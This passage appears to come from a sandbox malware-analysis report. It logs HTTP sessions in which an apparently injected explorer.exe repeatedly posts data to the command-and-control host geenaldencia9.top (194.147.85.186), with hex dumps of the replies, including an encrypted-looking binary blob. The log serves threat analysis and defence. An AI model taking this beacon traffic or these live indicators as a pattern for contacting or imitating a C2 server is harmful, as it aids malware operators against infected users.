                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 122
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.657134056 CEST13446INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:44 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  16192.168.2.649811194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:44.969166040 CEST13447OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 170
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.146166086 CEST13448INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:45 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  17192.168.2.649812194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.225800037 CEST13449OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 258
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.377901077 CEST13449INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:45 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  18192.168.2.649813194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:45.879954100 CEST13450OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 140
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.036946058 CEST13451INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:45 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  19192.168.2.649815194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.150823116 CEST13456OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 203
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.312568903 CEST13458INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:46 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  2192.168.2.649768194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.019926071 CEST1415OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 318
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.167814016 CEST1415INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:19 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 72
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d be 51 d8 6d a5 1b 46 9b 10 bc bd 79 b3 64 41 11 ac b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4a 35 a9 f2 e0
                                                                                                                                                                                                  Data Ascii: I:82OOjQmFydA@dfkJ5


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  20192.168.2.649816194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.404578924 CEST13460OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 124
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.588947058 CEST13462INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:46 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  21192.168.2.649818194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.718038082 CEST13463OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 321
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:46.864677906 CEST13464INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:46 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  22192.168.2.649820194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:47.060090065 CEST13767OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 115
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:47.209739923 CEST14938INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:47 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 32 31 38 30 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7e 9f fe 8c e1 9e 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 1a 7d 6f 01 e0 04 89 9f dd 57 80 90 70 89 ae ff 4a 6b b6 e2 a2 22 48 22 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d2 ce 4e 49 b3 0b 5e 4c 65 55 5b ad 30 7a 83 bb 21 ca c3 e7 b2 ec f2 f1 0d 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 04 13 10 87 1e b1 b8 56 6c 79 f7 0a 83 8b 71 91 e0 e5 d9 66 d9 1b 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 51 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 12 32 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9d 82 eb d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 93 72 3e 9d 43 cd 17 fe 2f bf 9e f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 7a 50 67 74 40 b9 87 f6 88 81 de bb 6e 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef c3 de 47 dc ea c0 38 02 97 b5 a4 57 25 c1 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a c6 c1 22 7d e6 02 61 60 b9 d6 31 eb cd ae 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 a2 fa 56 d0 54 25 cf 66 2b 23 e4 93 32 e6 86 5a 26 39 1a 59 ae f5 cf 98 24 b1 9e e9 ea 33 9d f1 e1 2a e0 c2 28 5e 98 11 9a 4e 6a 8e ca 8d 0b da ca e4 46
                                                                                                                                                                                                  Data Ascii: 21802S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RY8|-:+%Wt#xQP0ObyT=a'4 YW\|;fKMXKw[Ge)29E"|~6N}oWpJk"H"I?m|6NI^LeU[0z!U5=PoV`GZVlyqfvy'$X9:-C'GkKmQ`#>[qJ8-,sq2K0Z"?+Qz`JMQAd'\#&Q#2YBAr>C/fGB%4VF>"7"h*6VzPgt@nk6'NGc:HNDG8W%bJ}Tzl9\@d="}a`1$@N!;KniwAg0!Wnawjg";kzR{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59VT%f+#2Z&9Y$3*(^NjF


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  23192.168.2.649822194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:48.783638954 CEST15080OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.141146898 CEST15081INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:48 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  24192.168.2.649823194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.325970888 CEST15082OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 248
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:49.509605885 CEST15083INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:49 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
